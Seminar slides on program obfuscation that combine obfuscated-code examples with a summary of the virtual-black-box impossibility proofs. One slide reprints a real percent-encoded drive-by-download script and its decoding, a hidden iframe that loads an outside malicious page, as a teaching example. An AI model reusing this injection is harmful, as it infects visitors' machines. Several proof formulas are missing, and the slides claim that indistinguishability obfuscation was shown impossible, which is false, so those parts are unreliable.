Seminar in Cryptographic Protocols: Program Obfuscation

Omer Singer, June 8, 2009

Practical Background

What is program obfuscation?

• Obfuscation is deliberately making software code so confusing that even those with access to the code can’t figure out what a program is going to do.

• “The art of making things appear more complicated”

Source: http://www.oreillynet.com/pub/a/mac/2005/04/08/code.html

What does this function do?

• Three main values:
– Potency
– Resilience
– Cost

• Many methods in use:
– Modify variable names and layout
– Replace integer values with complex equations
– Change program flow
– Modify data structures
– Anti-disassembly (“armored” viruses)
– Anti-debugging
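A minimal sketch of two of the methods listed above (renaming variables and replacing integer values with more complex expressions), written in Python for illustration. The function names `is_leap_year` and `f` are hypothetical and do not come from the slides; the point is only that both versions compute the same function while the second is harder to read.

```python
def is_leap_year(year: int) -> bool:
    """Readable original: Gregorian leap-year rule."""
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)


def f(O0: int) -> bool:
    """Same rule after renaming identifiers and rewriting constants."""
    l1 = (1 << 2)                 # 4, written as a shift
    I1 = (l1 + 1) ** 2 * l1       # 100, written as 5**2 * 4
    lI = I1 << 2                  # 400, written as 100 shifted left by 2
    return not O0 % l1 and (bool(O0 % I1) or not O0 % lI)


# Both versions agree on every year in this range.
assert all(is_leap_year(y) == f(y) for y in range(1, 3000))
```

Neither transformation changes what the program computes, which is why such obfuscation raises the cost of analysis without preventing it.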

And now for some seriously obfuscated programs…

Winner of the international C obfuscation contest in 1996

Shows the time on a clock with a configurable face and style

Winner of the international C obfuscation contest in 2001

Network-based Pong game

#include <unistd.h> #include <curses.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #define o0(M,W) mvprintw(W,M?M-1:M,"%s%s ",M?" ":"",_) #define O0(M,W) M##M=(M+=W##M)-W##M #define l1(M,W) M.tv_##W##sec #define L1(m,M,l,L,o,O) for(L=l;L--;)((char*)(m))[o]=((char*)(M))[O] #define I1 lL,(struct sockaddr*)&il #define i1 COLS #define j LINES #define L_ ((j%2)?j:j-1) fd_set I;struct socka\ ddr_in il;struct host\ ent*LI; struct timeval IL,l;char L[9],_[1<<9] ;void ___(int __ ){_[__--]=+0;if( ++__)___(--__);_ [__]='=';}double o,oo=+0,Oo=+0.2; long O,OO=0,oO=1 ,ii,iI,Ii,Ll,lL, II=sizeof(il),Il ,ll,LL=0,i=0,li, lI;int main(int\ iL,char *Li[]){\ initscr();cbreak ();noecho();nonl ();___(lI=i1/4); _[0]='[';_[lI-1] =']';L1(&il,&_,\ II,O,+O,+lI);il. sin_port=htons(( unsigned long)(\ PORT&0xffff));lL =l_;if(iL=!--iL) {il. sin_addr .\ s_addr=0;bind(I1 ,II);listen(lL,5 );lL=accept(I1,& II);}else{oO-=2; LI=gethostbyname (Li[1]);L1(&(il. sin_addr),(*LI). h_addr_list[0],\ LI->h_length,iI, iI,iI);(*(&il)). 
sin_family=(&(*\ LI))->h_addrtype ;connect(I1,II); }ii=Ii=(o=i1*0.5 )-lI/2;iI=L_-1;O =li=L_*0.5;while (_){mvaddch(+OO, oo,' ');o0(ii,iI );o0(Ii,Il-=Il); mvprintw(li-1,Il ,"%d\n\n%d",i,LL );mvhline(li,+0, '-',i1);mvaddch( O,o,'*');move(li ,Il);refresh();\ timeout(+SPEED); gettimeofday(&IL ,+0);Ll=getch(); timeout(0);while (getch()!=ERR);\ if(Ll=='q'&&iL)\ write(lL,_+1,1); if(ii>(ll=0)&&Ll ==','){write(lL, _,-(--Il));}else if(Ll=='.'&&ii+\ lI<i1){write(lL, _+lI,++Il);}else if(iL||!Il)write (lL,_+lI-1,4-3); gettimeofday(&l, 0);II=((II=l1(IL ,)+(l1(l,u)-=l1( IL,u))-l1(l,)+(\ l1(l,)-=l1(IL,)) )<0)?1+II-l1(l,) +1e6+(--l1(l,)): II;usleep((II+=\ l1(l,)*1e6-SPEED *1e3)<0?-II:+0); if(Ll=='q'&&!iL) break;FD_ZERO(&I );FD_SET(lL,&I); memset(&*&IL,ll, sizeof(l));if((\ Ll=select(lL+1,& I,0,0,&IL)));{if (read(lL,&L,ll+1 )){if(!*L){ll++; }else if(*L==ll[ _]){ll--; }else\ if(*(&(*L))==1[_ ]){break;}}else{ break;}}O0(o,O); O0(O,o);if(o<0){ o*=-1;Oo*=-1;}if (o>i1){o=i1+i1-o ;Oo*=-1;}if(o>=( Ii+=ll)&&O<1&&oO <0&&o<Ii+lI){O=2 ;oO=~--oO;Oo+=ll *4e-1;}if(O<0){O =iI;LL++;}if(o>= (ii+=Il)&&O>iI-1 &&oO>0&&o<ii+lI){O=iI- 2;oO=~--oO;Oo+=Il*4e-1 ;}if(+O>+iI){O-=O;i++; }}endwin();return(0);}

No more fun and games…

Actual web code blocked by an Intrusion Prevention System at a client:

<Script Language='Javascript'><!--document.write(unescape('%3C%48%54%4D%4C%3E%0A%3C%48%45%41%44%3E%0A%3C%54%49%54%4C

%45%3E%3C%2F%54%49%54%4C%45%3E%0A%3C%2F%48%45%41%44%3E%0A%3C%42%4F%44%59%20%6C%65%66%74%6D%61%72%67%69%6E%3D%30%20%74%6F%70%6D%61%72%67%69%6E%3D%30%20%72%69%67%68%74%6D%61%72%67%69%6E%3D%30%20%62%6F%74%74%6F%6D%6D%61%72%67%69%6E%3D%30%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%30%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%30%3E%0A%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%65%66%73%6F%69%70%61%61%77%61%2E%63%6F%6D%2F%65%77%69%6F%71%61%2F%22%3E%3C%49%4D%47%20%73%72%63%3D%22%62%61%6E%6E%65%72%32%2E%67%69%66%22%20%77%69%64%74%68%3D%22%33%30%32%22%20%68%65%69%67%68%74%3D%22%32%35%32%22%20%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%61%3E%0A%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%78%63%7A%78%6F%2E%69%6E%66%6F%2F%6D%70%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%46%52%41%4D%45%42%4F%52%44%45%52%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%6E%6F%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%0A%0A%3C%2F%42%4F%44%59%3E%0A%3C%2F%48%54%4D%4C%3E'));

//--></Script>

When unobfuscated…

<HTML><HEAD><TITLE></TITLE></HEAD><BODY leftmargin=0 topmargin=0 rightmargin=0 bottommargin=0 marginheight=0 marginwidth=0>

<a href="http://www.efsoipaawa.com/ewioqa/"><IMG src="banner2.gif" width="302" height="252" border="0"></a>

<iframe src="http://lxczxo.info/mp/in.php" width="1" height="1" FRAMEBORDER="0" SCROLLING="no"></iframe>

</BODY></HTML>

Source: http://www.finjan.com/Content.aspx?id=1456
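The decoding step can be reproduced with a few lines of Python. This is a sketch, not the tool used in the cited analysis: it applies the standard library's `urllib.parse.unquote` to the opening bytes of the payload shown above, which performs the same `%XX` decoding that JavaScript's `unescape` applies to this string.

```python
from urllib.parse import unquote

# Opening of the escaped payload from the blocked script.
escaped_prefix = "%3C%48%54%4D%4C%3E%0A%3C%48%45%41%44%3E"

decoded = unquote(escaped_prefix)
print(decoded)
```

The output is the first two tags of the unobfuscated page, `<HTML>` and `<HEAD>`, separated by a newline.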

• Obfuscation helps to bypass antivirus, delay security research response

• Obfuscated web code is often the first step in a “drive-by download” attack

• When the web code is executed by the browser it calls programs to target local software

• Result is infection of the user’s computer

Source: http://viruslist.com/en/analysis?pubid=204792056

Google Search Results Containing a Harmful URL

Attempt to calculate impact of obfuscated online attacks:

$13.2 billion direct damages of malware [1]

× 74% of malware spread via compromised websites [2]

× 80% of browser-based attacks are now obfuscated [3]

= $7.8 billion

Sources:

[1] http://www.itu.int/ITU-D/cyb/cybersecurity/docs/itu-study-financial-aspects-of-malware-and-spam.pdf

[2] http://viruslist.com/en/analysis?pubid=204792056

[3] http://www.securityfocus.com/brief/846
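The $7.8 billion figure is the product of the three cited numbers. The short check below makes that arithmetic explicit; treating the two percentages as independent multiplicative shares of the damages is the slide's own simplifying assumption, and the variable names are illustrative.

```python
direct_damages_usd = 13.2e9   # direct damages of malware (source 1)
share_via_websites = 0.74     # malware spread via compromised websites (source 2)
share_obfuscated = 0.80       # browser-based attacks that are obfuscated (source 3)

estimate_usd = direct_damages_usd * share_via_websites * share_obfuscated
print(f"${estimate_usd / 1e9:.1f} billion")  # $7.8 billion
```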

Knowing is half the battle…

A few tips to stop obfuscated “drive-by download” attacks

• Use NoScript to block active content on Firefox

• Don’t click on web ads

• Keep client-side software updated: Adobe Reader, Flash Player, Apple Quicktime, etc.

Program obfuscation has some positive uses as well!

• Preventing source code theft
– Disrupt reverse engineering
– Block code copying
– Especially important with the increased use of Java and .NET languages such as C# and Visual Basic, which compile to intermediate bytecode rather than machine code
– Microsoft recommends obfuscating ASP files in case of server compromise

• Watermarking and Digital Rights Management (DRM)

“If obfuscation technology was ever perfected we would have perfect DRM and perfect malware. Yet, that outcome is unlikely. The computer ultimately has to decipher and follow a software program’s true instructions. Each new obfuscation technique has to abide by this requirement and, thus, will be able to be reverse engineered.”

- Chris Wysopal, “Good Obfuscation, Bad Code”

Definitions

Oracle Access

• Used by [B+] to model the adversary

• The oracle is some function f

• Adversary makes query q to the oracle, receives answer f(q)

• Useful when studying obfuscation: the oracle serves as an interface to the program without exposing its contents

[Figure: Adversary with Oracle Access. The adversary sends a query q to the oracle, which passes it to the program; the answer f(q) returns along the same path.]
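Oracle access can be pictured as an interface that answers queries but reveals nothing else. The sketch below models only that interface: Python does not actually hide the wrapped function, and `Oracle`, `secret_program`, and `adversary` are hypothetical names chosen for this illustration.

```python
from typing import Callable, List


class Oracle:
    """Wraps a function so callers can query it but are not shown its code."""

    def __init__(self, f: Callable[[int], int]) -> None:
        self._f = f
        self.queries = 0  # number of queries made so far

    def query(self, q: int) -> int:
        self.queries += 1
        return self._f(q)


def secret_program(q: int) -> int:
    # Hypothetical program; the adversary never sees this body.
    return (q * q + 7) % 11


def adversary(oracle: Oracle) -> List[int]:
    # The adversary learns only the answers f(q) to the queries it chooses.
    return [oracle.query(q) for q in range(4)]


oracle = Oracle(secret_program)
answers = adversary(oracle)
print(answers, oracle.queries)  # [7, 8, 0, 5] 4
```

An efficient adversary can make only polynomially many such queries, which is what limits how much it can learn about f.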

Virtual Black Box

Anything one can efficiently compute from a virtual black box, one should be able to efficiently compute given just oracle access to the program.

In other words, for any adversary A there exists a simulator S such that whatever A can learn given an obfuscated program, S can learn from oracle access to that program.

[Figure: cartoon contrasting the two parties. Labels: “Speaks Spanish”, “Answers in the form of a question”. Query q: “Tell me about yourself”. Answer f(q): “¿Qué quieres saber?”]

Adversary with access to the virtual black box

Simulator with oracle access to the function

Circuit

In the [B+] paper on obfuscation, a circuit plays the role of a Turing machine restricted to inputs of a fixed, finite length.

• Circuits are easier to put in a virtual black box.

• Therefore obfuscating circuits is easier than obfuscating TMs.

• Proofs in the [B+] paper first establish theorems for TMs and then extend them to circuits.

Obfuscators

• An obfuscator is an algorithm O that restricts what an adversary can learn about a program P given O(P).

• What is the adversary trying to achieve?
– A program that produces the same output as P
– A program that produces output with some relation to the output of P
– Compute some function of P
– Decide some property of P

• The last goal is the weakest, so we want to prove that even preventing it is impossible.

General Impossibility Proof

TM Obfuscator

A probabilistic algorithm O is a TM obfuscator if the following conditions hold…

Functionality:

For every Turing machine M, the string O(M) describes a Turing machine that computes the same function as M.

Polynomial slowdown:

The description length and running time of O(M) are at most polynomially larger than those of M

“Virtual black box” property:

For any PPT A, there is a PPT S and a negligible function α such that for all TMs M
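The inequality that completes this condition appeared as an image on the slide and is missing from the transcript. As a reconstruction based on the definition in [B+] (not on the slide itself), it can be written as follows, where $S^{M}$ denotes S running with oracle access to M and $1^{|M|}$ tells S the description length of M:

```latex
\left| \Pr\big[A(O(M)) = 1\big] - \Pr\big[S^{M}(1^{|M|}) = 1\big] \right| \le \alpha(|M|)
```

In words: the probability that A outputs 1 given the obfuscated code is almost the same as the probability that S outputs 1 given only query access.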

Circuit Obfuscator

• Same idea as TM Obfuscator but intuitively easier since a circuit computes a function with inputs of particular length

• Hence the proposition:

If a TM obfuscator exists, then a circuit obfuscator exists

• Thus if we prove impossibility for circuit obfuscators, impossibility of TM obfuscators follows

Unobfuscatable Circuit Ensemble

• A family of circuits such that:
– Every circuit c in the family is efficient
– There exists a predicate π(c) such that
  • π(c) is hard to compute with oracle access to the function that c computes
  • π(c) is easy to compute with access to any circuit c’ that computes the same function as c

Main Proof Structure

[B+] structure their proof of the main impossibility result as follows:

1. Define obfuscators that are secure when applied to two programs

2. Show that such obfuscators do not exist

3. Modify the construction to prove that TM/circuit obfuscators do not exist

4. Show how this proof yields an unobfuscatable function ensemble

2-TM Obfuscator

A 2-TM obfuscator is defined the same way as a TM obfuscator but with a strengthened “virtual black box” property: the adversary has access to two obfuscated Turing machines.

• Formal definition of the strengthened “virtual black box” property:

Adversary with access to two obfuscated TMs

Simulator with oracle access to the two TMs
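The formula that these two labels annotate is missing from the transcript. Reconstructed from the definition in [B+] (an assumption about what the slide displayed), the strengthened property says that for any PPT A there is a PPT S and a negligible function α such that for all TMs M and N:

```latex
\left| \Pr\big[A(O(M), O(N)) = 1\big] - \Pr\big[S^{M,N}(1^{|M|+|N|}) = 1\big] \right| \le \alpha\big(\min\{|M|, |N|\}\big)
```

The first term is the adversary holding both obfuscated machines; the second is the simulator with oracle access to both.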

Proposition: 2-TM obfuscators do not exist.

According to [B+], “the essence of this proof is that there is a fundamental difference between getting oracle access to a function and getting the program that computes it, no matter how obfuscated”.

Proof by contradiction…

• Suppose that there exists a 2-TM obfuscator O.

• Consider a function that cannot be learned by oracle queries, for example the following Turing machine:

• Define another Turing machine such that:

• Consider an adversary A such that: A(C,D) = D(C)
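The two machine definitions referred to in the bullets above were images and are missing from the transcript. In [B+] they take the following form for strings α, β of length k; this is a reconstruction from the paper rather than from the slide, and $Z_k$ is the all-zero machine the paper uses for comparison:

```latex
C_{\alpha,\beta}(x) =
\begin{cases}
\beta & \text{if } x = \alpha \\
0^{k} & \text{otherwise}
\end{cases}
\qquad
D_{\alpha,\beta}(C) =
\begin{cases}
1 & \text{if } C(\alpha) = \beta \\
0 & \text{otherwise}
\end{cases}
\qquad
Z_{k}(x) = 0^{k}
```

In the Turing-machine setting, D runs its input program on α only for a bounded (polynomial in k) number of steps so that it always halts.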

Then for any α,β:

Therefore S must output 1 when given oracle access to C and D, and must output 0 when C is replaced by a machine that always outputs zeros. But S cannot differentiate between the two cases through oracle queries, so we have a contradiction.
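The asymmetry in this argument can be sketched in Python. No obfuscator is implemented here: the attack relies only on the functionality property (an obfuscated program can still be run), so plain callables stand in for O(C) and O(D). The parameter `K` and the helper names `make_C`, `make_D`, and `Z` are assumptions made for this illustration.

```python
import secrets

K = 64  # bit length of alpha and beta (illustrative choice)


def make_C(alpha: int, beta: int):
    """C outputs beta on input alpha and 0 everywhere else."""
    return lambda x: beta if x == alpha else 0


def make_D(alpha: int, beta: int):
    """D takes a program and outputs 1 iff that program maps alpha to beta."""
    return lambda program: 1 if program(alpha) == beta else 0


def Z(x: int) -> int:
    """The all-zero function."""
    return 0


def adversary(C, D) -> int:
    """A(C, D) = D(C): run the second program on the first one."""
    return D(C)


alpha = secrets.randbits(K)
beta = secrets.randbits(K) | 1  # force beta != 0 so Z never maps alpha to beta
C, D = make_C(alpha, beta), make_D(alpha, beta)

print(adversary(C, D))  # 1: D accepts C
print(adversary(Z, D))  # 0: D rejects the all-zero program

# A party limited to queries sees C and Z agree unless it happens to ask alpha.
agreements = sum(C(q) == Z(q) for q in range(1000))
print(agreements >= 999)  # True
```

Holding the code lets the adversary feed one program to the other, while a simulator with query access would have to guess α to see any difference between C and the all-zero function.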

The combination of these equations contradicts the fact that O is a 2-TM obfuscator:

Recall that a 2-TM obfuscator O is defined with the “virtual black box” property that:

In the [B+] paper, the proof that 2-TM obfuscators do not exist is extended to show that 2-circuit obfuscators also do not exist.

TM Obfuscator

• [B+] extend the two-program obfuscation impossibility result to single program obfuscation.

• The extension is based on the ability to combine functions/TMs

In [B+] the combination of two functions f0 and f1 is defined as (f0#f1)(b, x) = f_b(x), where b is a single bit.

A program C is decomposed into C0#C1 by setting C_b(x) = C(b, x).

By this definition, having oracle access to a combined function f0#f1 is the same as having oracle access to f0 and f1 individually.
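A small sketch of combination and decomposition, assuming the definition from [B+] in which a selector bit b chooses between the two functions, (f0#f1)(b, x) = f_b(x). The example functions `double` and `square` are hypothetical placeholders.

```python
from typing import Callable, Tuple

Func = Callable[[int], int]


def combine(f0: Func, f1: Func) -> Callable[[int, int], int]:
    """(f0 # f1)(b, x) = f_b(x): the selector bit b picks the function."""
    return lambda b, x: f1(x) if b else f0(x)


def decompose(c: Callable[[int, int], int]) -> Tuple[Func, Func]:
    """Recover C_0 and C_1 from a combined program via C_b(x) = C(b, x)."""
    return (lambda x: c(0, x)), (lambda x: c(1, x))


def double(x: int) -> int:   # hypothetical f0
    return 2 * x


def square(x: int) -> int:   # hypothetical f1
    return x * x


combined = combine(double, square)
c0, c1 = decompose(combined)

print(combined(0, 5), combined(1, 5))  # 10 25
print(c0(5), c1(5))                    # 10 25
```

Because each query to the combined function is a query to exactly one of its halves, one oracle for the combination carries the same information as two separate oracles.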

Theorem: TM obfuscators do not exist.

The adversary A is the same as before only modified to decompose the program that it receives.

Suppose for the sake of contradiction that there exists a TM obfuscator O.

These equations contradict the virtual black-box property required for O being a TM obfuscator.
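The equations referred to here were images on the slide and did not survive extraction. Following the argument in [B+], and writing C and D for the two machines from the 2-TM proof, Z for the machine that always outputs zeros, and k for the length of the hidden strings α and β, they can be reconstructed along these lines. This is a reconstruction from the paper, not from the slide; probabilities are over uniformly random α, β and the coins of A, S, and O.

```latex
\begin{align*}
\Pr\big[A(O(C \# D)) = 1\big] &= 1 \\
\Pr\big[A(O(Z \# D)) = 1\big] &= 2^{-k} \\
\left| \Pr\big[S^{C \# D}(1^{k}) = 1\big] - \Pr\big[S^{Z \# D}(1^{k}) = 1\big] \right| &\le 2^{-\Omega(k)}
\end{align*}
```

The first two lines differ by almost 1, while the third says that no simulator can notice the difference.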

• In [B+] this proof is extended to circuit obfuscators.

• The challenge with extending to circuit obfuscators is greater than expected
– Size of the circuit is greater than the input length
– Adapt the proof using homomorphic encryption properties

Unobfuscatable Circuit Ensembles

• The case against obfuscators is further strengthened by proving the existence of unobfuscatable circuit ensembles.

The unobfuscatable circuit ensemble is defined as

Reminder:

We can now show that given any circuit that computes the same function as , we can reconstruct the latter.

• Since D’ computes the same function as D and , we have

• We can now reconstruct

Indistinguishability Obfuscator

• Obfuscation models weaker than the “virtual black box” may still be useful for software protection

• Indistinguishability obfuscator: Obfuscations of equivalent circuits of the same size should be computationally indistinguishable.

• Later works have shown this model to be impossible to achieve as well
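A toy illustration of the indistinguishability requirement, not a practical obfuscator: for functions on a handful of input bits, replacing a program by its full truth table gives a canonical form, so any two equivalent programs map to the identical output. The table is exponential in the input length, so this sketch ignores the efficiency requirement entirely; the names `canonical_obfuscate`, `evaluate`, `xor_a`, and `xor_b` are hypothetical.

```python
from itertools import product
from typing import Callable, Tuple

Bits = Tuple[int, ...]


def canonical_obfuscate(f: Callable[[Bits], int], n: int) -> Tuple[int, ...]:
    """Return f's truth table over all n-bit inputs (exponential in n)."""
    return tuple(f(bits) for bits in product((0, 1), repeat=n))


def evaluate(table: Tuple[int, ...], bits: Bits) -> int:
    """Run the transformed program: look the input up in the table."""
    index = int("".join(map(str, bits)), 2)
    return table[index]


def xor_a(bits: Bits) -> int:
    return bits[0] ^ bits[1]


def xor_b(bits: Bits) -> int:
    # Equivalent function, written differently.
    return (bits[0] | bits[1]) & (1 - (bits[0] & bits[1]))


table_a = canonical_obfuscate(xor_a, 2)
table_b = canonical_obfuscate(xor_b, 2)
print(table_a == table_b)         # True
print(evaluate(table_a, (1, 0)))  # 1
```

Since both programs produce the same table, nothing about how each was originally written can be recovered from the output.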

Software Watermarking

We would like to be able to “watermark” a program such that the code will always have a certain identifier that cannot be removed.

• A good software watermarking scheme should have the following properties:
– Functionality: The marked program computes the same function as the original program.
– Meaningfulness: Most other programs don’t have this marking.
– Fragility: It is infeasible to remove the mark from the program without (substantially) changing its behavior.

• [B+] sought to formalize the watermarking problem as it relates to obfuscation.

• [B+] sketch a proof showing that no such watermarking scheme exists.

• For any unobfuscatable program, we know that an adversary will be able to take the obfuscated (marked) program and reconstruct the (unmarked) source code.

Conclusion

• [B+] have made progress in formalizing the concept of program obfuscation.

• They have shown that the “virtual black box” paradigm is impossible to satisfy.

• Somewhat strong obfuscation of some programs remains a possibility

• Program obfuscation has an increasingly important role in the race between hackers and the information security community.

• Additional research is needed to increase the effectiveness of malware detection.

• Significant progress in obfuscation techniques may break the current signature-based detection model.

Final Thoughts

Thanks for listening!
